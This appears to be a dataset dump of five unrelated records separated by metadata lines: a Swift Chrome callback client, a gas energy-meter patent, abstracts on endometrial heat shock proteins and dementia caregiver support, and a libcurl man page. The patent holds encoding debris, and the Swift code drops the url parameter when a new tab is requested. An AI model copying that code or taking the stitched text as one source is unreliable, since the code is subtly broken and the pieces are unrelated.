// // GoogleChrome // CallbackURLKit /* The MIT License (MIT) Copyright (c) 2016 Eric Marchand (phimage) Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ // import CallbackURLKit public class GoogleChrome: Client { public init() { super.init(urlScheme: "googlechrome-x-callback") } public func open(url: String, newTab: Bool = false, onSuccess: SuccessCallback? = nil, onFailure: FailureCallback? = nil, onCancel: CancelCallback? = nil) throws { var parameters = ["url": url] if newTab { parameters = ["create-new-tab": ""] } try self.perform(action: "open", parameters: parameters, onSuccess: onSuccess, onFailure: onFailure, onCancel: onCancel) } }
null
minipile
NaturalLanguage
mit
null
1. Field of the Invention This invention relates to an energy meter and a method of metering consumed energy. This invention is particularly applicable to the supply of energy in the form of fuel gas. 2. Discussion of the Background Conventionally energy consumption in the form of fuel gas is determined for billing purposes by measuring the volume of gas supplied to the consumer by providing a gas flow meter at the point of delivery. The gas supplier also remotely monitors the quality of gas supplied to a distribution area occupied by the consumer using the calorific value (CV) of the gas which is the fundamental measure of energy per unit volume, generally measured with a large and expensive chromatograph. From the CV of the gas supplied to the area together with the reading of the volume of fuel gas consumed by the customer, the gas supplier is able to determine the energy consumption from which the consumer is charged. As the customer is only able to determine the volume, of gas consumed without knowing the gas quality, he is unable to precisely monitor how much he will be charged. This is particularly disadvantageous for pre-payment xe2x80x9ccoin operatedxe2x80x9d gas meters. According to a first aspect of the present invention an energy meter comprises: means to measure a volume of gas supplied; means to measure a calorific value of the gas supplied; and means to calculate an energy value corresponding to the measured volume of gas supplied and the measured calorific value wherein both of the means to measure a volume of gas supplied and the means to measure a calorific value of the gas supplied are provided in a single integral meter unit. According to a second aspect of the present invention a method of determining a quantity of energy supplied to a consumer comprises: measuring a volume of gas supplied; measuring a calorific value of the gas supplied; and calculating an energy value of the supplied gas corresponding to the measured volume of gas supplied and the measured calorific value wherein both the measuring of a volume of gas supplied and the measuring of a calorific value of the gas supplied are performed at substantially the point of delivery to the consumer. The provision of an energy reading at the customer,s premises enables the consumer to monitor how much he will be charged. This is especially advantageous for pre-payment meters. According to a further aspect of the present invention an energy meter comprises: means to measure a volume of gas supplied; an apparatus to measure a calorific value of the gas including means to measure the speed of sound in the gas and means to use the speed of sound in an operation producing the calorific value of the gas corresponding to said speed of sound; and means to calculate an energy value corresponding to the measured volume of gas supplied and the measured calorific value. According to a still further aspect of the present invention a method of determining a quantity of energy supplied comprises: measuring a volume of gas supplied; measuring a calorific value of the gas supplied including measuring the speed of sound in the gas and using the speed of sound in an operation producing the calorific value of the gas corresponding to said speed of sound; and calculating an energy value of the supplied gas corresponding to the measured volume of gas supplied and the measured calorific value. The means to measure a volume of gas supplied and the apparatus to measure the calorific value of the gas are preferably provided in a single unit. The means to calculate an energy value may also be provided in the same unit but may additionally or alternatively be provided remotely, for example at the gas supplier""s billing department. Since the speed of sound of a gas can be determined by a conveniently compact and inexpensive device it can be provided in a small meter unit and provided with correspondingly compact means, preferably in the form of control electronics or a processing means, to produce the calorific value from the measured speed of sound. Such an apparatus to measure a calorific value of the gas is much smaller, cheaper and easier to operate than a conventional calorific value measuring device such as a chromatograph. Consequently, this enables the production of a meter to measure energy which is small, cheap and reliable when used with a means to measure a volume of gas supplied. The calorific value of a gas is preferably measured by making a measure of a first thermal conductivity of the gas at a first temperature, making a measure of a second thermal conductivity of the gas at a second temperature which differs from the first temperature, and using the speed of sound and the first and second thermal conductivities in an operation producing the calorific value of the gas corresponding to said speed of sound and said first and second thermal conductivities. The above described meter and method are suitable for both domestic and industrial use. All references to the calorific value include parameters equivalent to calorific value such as Wobbe Index x{square root over (RD)}. All references to calorific value also include parameters dependent upon calorific value which when considered with the volume of gas supplied produce a parameter dependent upon the energy value. All references to energy value include parameters dependent upon energy values such as cost in the local currency. The cost is determined by multiplying the consumed energy, measured in Joules or Watt hours for example, by the cost per unit of energy.
null
minipile
NaturalLanguage
mit
null
Over-expression of heat shock proteins in carcinogenic endometrium. We have previously shown that the subcellular localization of beta-catenin changes according to the cell proliferation status of the human endometrium, suggesting a role of intercellular transduction in cell growth control in human endometrium not only in the physiological but also in the carcinogenic condition. To further study the possible role of heat shock proteins (HSPs) in growth control, we immunohistochemically analyzed 92 endometrial samples, 30 of normal endometrium, 20 of endometrial hyperplasia and 42 of endometrial cancer, for expression of HSP27, HSP70, HSP90, estrogen receptor (ER) and progesterone receptor. HSP27 and HSP90 were detected in endometrial epithelium strongly in the proliferative phase and weakly in the secretory phase during the menstrual cycle according to the serum estradiol level. However, they were over-expressed in endometrial hyperplasia, especially HSP27. In endometrial cancer, HSP27 expression was heterogenic among the glands and lower than that in the proliferative phase and endometrial hyperplasia. HSP27 over-expression was also observed in samples including endometrial cancer and associated hyperplasia. Results of Western blotting followed those of immunohistochemistry. HSP70 was not changed during the menstrual cycle, as HSP27 and HSP90 were, and was rather stably expressed in endometrial hyperplasia and cancer. Our results suggest that HSP27 and HSP90 contribute to cell proliferation in endometrial epithelium and that over-expression of HSP27 in endometrial hyperplasia occurs as a result of the activated condition of ER, though in cancer it decreases according to the loss of function of ER.
null
minipile
NaturalLanguage
mit
null
Over two decades of research has demonstrated that family caregivers are at elevated risk of a number of negative outcomes, including psychological distress, physical illness, and economic strain, and in turn to disruptions in social relationships. Social support interventions have been seen as a primary response to preventing, postponing, or reversing these negative sequelae of caregiving. Despite this potential, there is a paucity of rigorous evaluation research on such interventions. The proposed project will evaluate different modes of delivering social support interventions for family caregivers to relatives with Alzheimer's disease (AD) or other irreversible dementia. The project is grounded in theory and empirical research on status transitions and their impact on interpersonal relationships. This literature suggests that increasing the number of social network members who have undergone the same stressful situation (in this case, caring for an elderly relative) will lead to increased well-being among caregivers. The study will advance knowledge in this area by employing a) a strong theoretical grounding for the intervention: b) a randomized control-group design; c) reliable and valid outcome measures that are closely related to the goals of the intervention; d) a descriptive process component; and e) longitudinal follow-up. The project will be conducted in close collaboration with practitioners, and results will be widely disseminated. This design will allow exploration of the following research questions: 1. Does increasing the number of caregivers in an individual's network lead to positive outcomes? 2. Does the effectiveness of the program differ according to whether it is delivered in a group or dyadic setting? 3. Is the effectiveness of this intervention related to the structure of the individual's preexisting social network? Is the effectiveness of this intervention affected by the degree of stress of the caregiving situation? 5. Does the effectiveness of the intervention differ in rural and nonrural settings?
null
minipile
NaturalLanguage
mit
null
.\" ************************************************************************** .\" * _ _ ____ _ .\" * Project ___| | | | _ \| | .\" * / __| | | | |_) | | .\" * | (__| |_| | _ <| |___ .\" * \___|\___/|_| \_\_____| .\" * .\" * Copyright (C) 1998 - 2015, Daniel Stenberg, <[email protected]>, et al. .\" * .\" * This software is licensed as described in the file COPYING, which .\" * you should have received as part of this distribution. The terms .\" * are also available at https://curl.haxx.se/docs/copyright.html. .\" * .\" * You may opt to use, copy, modify, merge, publish, distribute and/or sell .\" * copies of the Software, and permit persons to whom the Software is .\" * furnished to do so, under the terms of the COPYING file. .\" * .\" * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY .\" * KIND, either express or implied. .\" * .\" ************************************************************************** .\" .TH CURLINFO_APPCONNECT_TIME 3 "28 Aug 2015" "libcurl 7.44.0" "curl_easy_getinfo options" .SH NAME CURLINFO_APPCONNECT_TIME \- get the time until the SSL/SSH handshake is completed .SH SYNOPSIS #include <curl/curl.h> CURLcode curl_easy_getinfo(CURL *handle, CURLINFO_APPCONNECT_TIME, double *timep); .SH DESCRIPTION Pass a pointer to a double to receive the time, in seconds, it took from the start until the SSL/SSH connect/handshake to the remote host was completed. This time is most often very near to the \fICURLINFO_PRETRANSFER_TIME(3)\fP time, except for cases such as HTTP pipelining where the pretransfer time can be delayed due to waits in line for the pipeline and more. See also the TIMES overview in the \fIcurl_easy_getinfo(3)\fP man page. .SH PROTOCOLS All .SH EXAMPLE TODO .SH AVAILABILITY Added in 7.19.0 .SH RETURN VALUE Returns CURLE_OK if the option is supported, and CURLE_UNKNOWN_OPTION if not. .SH "SEE ALSO" .BR curl_easy_getinfo "(3), " curl_easy_setopt "(3), "
null
minipile
NaturalLanguage
mit
null